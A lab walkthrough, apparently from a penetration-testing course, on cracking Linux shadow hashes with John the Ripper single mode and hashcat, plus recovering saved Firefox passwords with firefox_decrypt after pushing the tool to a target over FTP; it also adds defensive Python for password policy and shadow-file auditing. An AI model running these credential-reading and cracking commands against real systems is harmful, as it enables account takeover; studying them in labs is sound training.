# Linux Auth & Credential Hunting — Lab Walkthrough

### Lab 1 — Cracking Linux Credentials

#### Objective 1: Find martin's password using Single Crack Mode

Single crack mode generates candidates derived from the username itself — inversions, number appends, capitalizations, etc. It's the fastest mode and works when users set weak passwords based on their own username.

**Step 1 — Combine passwd and shadow:**

```bash
unshadow passwd shadow | tee unshadowed
```

**Step 2 — Run JtR in single crack mode:**

```bash
john --single unshadowed
```

JtR derives `martin`'s password directly from the username. If it cracks, the password was trivially username-based.

**View cracked passwords:**

```bash
john --show unshadowed
```
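The defensive counterpart to the single-mode check above, as an added example that is not part of the lab or of John the Ripper: a set-time password policy test that rejects choices derived from the username by the transformations the text names (reversal, appended digits or symbols, capitalisation). The function names are assumptions for this example.

```python
import re

def username_derivation(username, password):
    """Return how `password` derives from `username` (the class of guesses
    single crack mode tries first), or None if it does not.
    Covered: same word, reversed word, capitalisation, appended digits/symbols."""
    user = username.lower()
    if not user:
        return None
    # Drop an appended suffix such as "123", "2024" or "!" before comparing.
    core = re.sub(r"[^A-Za-z]+$", "", password)
    lowered = core.lower()
    if lowered == user:
        base = "username"
    elif lowered == user[::-1]:
        base = "reversed username"
    else:
        return None
    mods = []
    if core != lowered:
        mods.append("capitalised")
    if core != password:
        mods.append("suffix appended")
    return base + (f" ({', '.join(mods)})" if mods else "")

def check_password_change(username, new_password):
    """Policy decision for a password change: (accepted, reason)."""
    reason = username_derivation(username, new_password)
    if reason:
        return False, f"password is the {reason}; single crack mode would recover it"
    return True, "ok"
```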

***

#### Objective 2: Find sarah's password using a Wordlist Attack

**Step 1 — Identify hash type:**

Sarah's hash starts with `$6$` → SHA-512crypt.

```bash
hashcat --help | grep sha512
# Mode 1800 = sha512crypt $6$, SHA512 (Unix)
```

**Step 2 — Isolate the hash:**

```bash
echo '$6$EBOM5vJAV1TPvrdP$LqsLyYkoGzAGt4ihyvfhvBrrGpVjV976B3dEubi9i95P5cDx1U6BrE9G020PWuaeI6JSNaIDIbn43uskRDG0U/' | tee myhash
```

> Always isolate just the hash portion — the full shadow line format (`user:hash:...`) is for JtR. Hashcat needs the raw hash only.

**Step 3 — Run hashcat dictionary attack:**

```bash
hashcat -a 0 -m 1800 myhash /usr/share/wordlists/rockyou.txt
```

| Flag | Value  | Meaning                      |
| ---- | ------ | ---------------------------- |
| `-a` | `0`    | Dictionary (straight) attack |
| `-m` | `1800` | SHA-512crypt (`$6$`)         |
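Steps 1 and 2 above (read the `$id$` prefix, then isolate the raw hash) as an added example that is not part of the lab or of hashcat: a small `/etc/shadow` auditor that splits each line, pulls out the hash portion hashcat wants, maps the prefix to a scheme and mode, and flags password fields a defender should fix. The `SCHEMES` table and all sample lines except sarah's (whose hash is the one from the lab) are constructed for this example.

```python
import re

# $id$ prefix -> (scheme, hashcat mode). Constructed table; 1800 is the lab's mode for $6$.
SCHEMES = {"1": ("md5crypt", 500), "5": ("sha256crypt", 7400),
           "6": ("sha512crypt", 1800), "y": ("yescrypt", None)}
DEFAULT_ROUNDS = 5000  # sha-crypt iteration count when no rounds= field is present
CRYPT_RE = re.compile(r"\$([^$]+)\$(?:rounds=(\d+)\$)?([^$]*)\$(.+)")

def parse_shadow_line(line):
    """Split one /etc/shadow line and classify its password field."""
    user, pw = line.rstrip("\n").split(":")[:2]
    raw = pw.lstrip("!")                        # "!$6$..." is locked but keeps its hash
    status = ("no-password" if pw == "" else
              "locked" if pw.startswith("!") or pw == "*" else "active")
    rec = {"user": user, "status": status, "hash": raw if raw not in ("", "*") else None,
           "scheme": None, "mode": None, "rounds": None}
    m = CRYPT_RE.match(rec["hash"] or "")
    if m and m.group(1) in SCHEMES:
        rec["scheme"], rec["mode"] = SCHEMES[m.group(1)]
        if m.group(1) in ("5", "6"):             # rounds= only exists for sha-crypt
            rec["rounds"] = int(m.group(2)) if m.group(2) else DEFAULT_ROUNDS
    return rec

def audit_shadow(text):
    """Return (user, finding) pairs for password fields a defender should fix."""
    findings = []
    for line in filter(str.strip, text.splitlines()):
        r = parse_shadow_line(line)
        if r["status"] == "no-password":
            findings.append((r["user"], "empty password field"))
        elif r["status"] != "active":
            continue                             # locked accounts cannot be used
        elif r["scheme"] == "md5crypt":
            findings.append((r["user"], "legacy md5crypt ($1$) hash"))
        elif r["rounds"] is not None and r["rounds"] < DEFAULT_ROUNDS:
            findings.append((r["user"], f"sha-crypt rounds={r['rounds']} below default"))
    return findings

# Constructed sample: sarah's line carries the hash from the lab; the rest are fakes.
SAMPLE = """\
root:$y$j9T$fakesalt$fakedigest:19700:0:99999:7:::
sarah:$6$EBOM5vJAV1TPvrdP$LqsLyYkoGzAGt4ihyvfhvBrrGpVjV976B3dEubi9i95P5cDx1U6BrE9G020PWuaeI6JSNaIDIbn43uskRDG0U/:19700:0:99999:7:::
legacy:$1$abcdefgh$fakedigestfakedigest22:19700:0:99999:7:::
svc:$6$rounds=1000$shortsalt$fakedigest:19700:0:99999:7:::
guest::19700:0:99999:7:::
locked:!$6$abcdefgh$fakedigest:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
"""
```

`parse_shadow_line(...)["hash"]` is exactly the value the lab writes to `myhash`; `audit_shadow(SAMPLE)` lists the accounts that should never reach a cracking job in the first place.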

***

### Lab 2 — Credential Hunting in Linux (Firefox Decrypt)

#### Objective: Find the password of user `will`

**Step 1 — Locate Firefox profile on target:**

```bash
ls -l ~/.mozilla/firefox/ | grep default
# Found: ytb95ytb.default-release
```

**Step 2 — Confirm credentials exist in logins.json:**

```bash
python3 -m json.tool ~/.mozilla/firefox/ytb95ytb.default-release/logins.json
```

Credentials are present but encrypted (`encryptedUsername`, `encryptedPassword`). The target URL is `https://dev.inlanefreight.com`.

**Step 3 — Set up firefox\_decrypt on attack machine:**

```bash
git clone https://github.com/unode/firefox_decrypt
cd firefox_decrypt
```

**Step 4 — Transfer to target via FTP:**

```bash
# On attack machine — start FTP server
sudo python3 -m pyftpdlib --port 21
```

```bash
# On target — download the tool
ftp <attack_machine_ip>
get firefox_decrypt.py
bye
```

**Step 5 — Run decryption on target:**

```bash
python3.9 firefox_decrypt.py
# Select profile when prompted → outputs plaintext credentials
```

***

### Key Takeaways

**Single crack mode** is the first thing to try on Linux hashes — it's near-instant and catches users who set passwords based on their username.

**Hash identification** from the `$id$` prefix is essential before running hashcat — wrong mode = no results.

**Firefox logins.json** always has encrypted credentials, but the decryption key (`key4.db`) is stored in the same profile directory — `firefox_decrypt` uses both together to recover plaintext.

**File transfer method matters** — when pip/wget isn't available or ports are restricted, `pyftpdlib` is a reliable one-liner FTP server for transferring tools to targets.

***

### Quick Reference

```bash
# Combine shadow files
unshadow passwd shadow > unshadowed

# JtR single crack
john --single unshadowed
john --show unshadowed

# Hashcat wordlist — SHA-512crypt
hashcat -a 0 -m 1800 myhash rockyou.txt

# Firefox decrypt
git clone https://github.com/unode/firefox_decrypt
# the profile directory is passed as a positional argument
python3.9 firefox_decrypt.py ~/.mozilla/firefox/<profile>/

# Serve files via FTP (attack machine)
sudo python3 -m pyftpdlib --port 21
```
